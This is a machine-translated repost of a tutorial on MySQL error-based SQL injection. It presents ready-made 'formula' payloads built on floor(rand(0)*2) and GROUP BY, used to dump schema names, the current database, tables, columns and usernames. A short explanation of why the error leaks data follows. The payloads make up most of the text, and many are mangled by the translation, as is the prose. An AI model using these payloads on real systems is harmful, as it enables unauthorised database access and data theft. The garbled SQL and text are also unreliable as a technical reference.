Analysis of the principle of MySQL error injection in depth analysis

Source: Internet
Author: User
Tags explode rand


Read about the MySQL error injection of technical articles, are similar to the following statements are injected. Such a statement is called the formula "formula", a lot of small dishes are used directly, do not know why this is. But I have to have this kind of two goods must understand these words.

Let's take a look at the whole process of injection:

Admin ' Union Select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), (select User () limit 0,1))-A from INFORMATION_SCHEMA.T Ables GROUP by a) b#

Explode all libraries

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,schema_name,0x27,0x7e) from Information_schema.schemata LIMIT 0,1)) from Information_schema.tables LIMIT 0,1), Floor (rand (0) *2)) x from Information_ Schema.tables GROUP by X) a) #

Explode current Database

Username=-99999999999′and (select 1 from (SELECT COUNT (*), concat () (Select () (select Concat () (cast) (The database () As Char)) (0x27,0x7e)) from Information_schema.tables limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) a) #

Explosion meter

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,hex (CAST (table_name as Char) ), 0x27,0x7e) from information_schema.tables where table_schema=0x64656d6f limit 0,1)) from Information_schema.tables Limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) #

Burst field

and (select 1 from (SELECT COUNT (*), concat ((Select) (SELECT DISTINCT concat (0x7e,0x27,column_name,0x27,0x7e) from Information_schema.columns where table_schema=0x64656d6f and table_name=0x75736572 limit 0,1)) from

Information_schema.tables limit 0,1), floor (rand (0) *2)) x from Information_schema.tables Group by X) #

Explosive content

and (select 1 from (SELECT COUNT (*), concat ((Select) (select Concat (0x7e,0x27,user.username,0x27,0x7e) from user Limit 0,1)) from Information_schema.tables limit 0,1), floor (rand (0) *2)) x to Information_schema.tables Group by X) #

The purpose of the burst was reached, and these statements made me most incomprehensible to floor (rand (0) *2), group by X, who was completely unaware of what was being taken out.

Check the relevant information in the MySQL official introduction to find the answer:
RAND () in a WHERE clause is re-evaluated every the where is executed.
You are cannot use a column with RAND () of the clause, because order by would evaluate the column multiple time S.

It means that RAND () can no longer be used in the order by.

Then you can't use GROUP by anymore.

If you use it, you will get an error.

Admin ' Union Select 1 from (SELECT COUNT (*), concat (Floor (rand (0) *2), (select User () limit 0,1))-A from INFORMATION_SCHEMA.T Ables GROUP by a) b#
A is: concat (Floor (rand (0) *2), (select User () limit 0,1))

There is Rand, followed by the group by a statement, so the error duplicate entry ' root ' for key ' Group_key '
And here "' Xxxxxxxxxx" is the content of user (), so there is a username.

You can do the following tests:
The error:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (FLOOR (RAND (0) *2), select CONCAT (0x5f,databas E (), 0x5f,user (), 0x5f,version ()))) (A from Information_schema.tables GROUP by a) b–

There is no error after removing Rand:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (0, select CONCAT (0x5f,database (), 0x5f,user () , 0x5f,version ()))) (a) Information_schema.tables GROUP by a) b–

Remove GROUP by a without an error:
Select ID from keyword WHERE id=1 UNION select 1 from (select COUNT (*), CONCAT (FLOOR (RAND (0) *2), select CONCAT (0x5f,databas E (), 0x5f,user (), 0x5f,version ())) (A from Information_schema.tables) b–

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.